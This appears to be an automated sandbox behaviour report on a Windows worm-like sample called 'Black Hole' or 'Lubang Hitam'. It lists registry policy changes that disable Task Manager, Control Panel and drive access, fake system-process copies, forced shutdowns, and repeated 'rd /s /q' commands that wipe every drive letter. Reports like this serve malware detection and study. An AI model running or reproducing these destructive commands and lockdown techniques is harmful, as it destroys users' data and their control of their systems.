\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoAdminPage = "1" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecycleFiles = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinkeys = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLowDiskSpaceChecks = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLowDiskSpaceChecks = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoPwdPage = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoPwdPage = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecycleFiles = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoAdminPage = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoAdminPage = "1" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoAdminPage = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" SMSS.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe"C:\Users\Admin\AppData\Local\Temp\d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe"1⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1508 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:2⤵PID:2616
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:2⤵PID:1336
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:2⤵PID:732
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:2⤵PID:5040
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:2⤵PID:2916
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:2⤵PID:3048
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:2⤵PID:2472
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:2⤵PID:3228
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:2⤵PID:5000
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:2⤵PID:2452
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:2⤵PID:3180
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:2⤵PID:4256
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:2⤵PID:4348
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:2⤵PID:4252
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:2⤵PID:3756
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:2⤵PID:4360
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:2⤵PID:4772
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:2⤵PID:4840
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:2⤵PID:4064
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:2⤵PID:4368
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:2⤵PID:1192
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:2⤵PID:2180
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:2⤵PID:1032
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:2⤵PID:3408
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2584 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:4040 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:1960
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:4316
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:4324
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:4636
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:3748
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:4292
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:2340
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:2612
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:776
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:4208
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:1796
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:2556
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:1452
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:3324
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:3016
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:728
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:1832
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:3448
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:1580
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:428
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:564
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:1956
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:2168
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:3928
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:4692 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1820 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:3500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3600
-
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2452 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:2788
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:116 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:944
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:320 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:3904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2340
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4800 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:4476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:940
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1464 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:2268
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!5⤵PID:724
-
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4768 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4840 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2156 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4572 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2352
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1400 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1732 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵PID:776
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3820 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q z:3⤵PID:1576
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q y:3⤵PID:4796
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q x:3⤵PID:1196
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q w:3⤵PID:4308
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q v:3⤵PID:396
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q u:3⤵PID:1952
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q t:3⤵PID:2448
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q s:3⤵PID:1400
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q r:3⤵PID:4084
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q q:3⤵PID:2868
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q p:3⤵PID:2856
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q o:3⤵PID:4348
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q n:3⤵PID:4908
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q m:3⤵PID:4452
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q l:3⤵PID:4880
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q k:3⤵PID:2232
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q j:3⤵PID:4712
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q i:3⤵PID:4840
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q h:3⤵PID:4924
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q g:3⤵PID:2436
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q f:3⤵PID:1772
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q e:3⤵PID:4568
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q d:3⤵PID:4440
-
-
C:\WINDOWS\SysWOW64\cmd.exeC:\WINDOWS\system32\cmd.exe /c rd /s /q c:3⤵PID:4696
-
-
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1776 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2264 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5096 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3320 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2180 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:940 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"2⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Modifies system executable filetype association
- Windows security modification
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
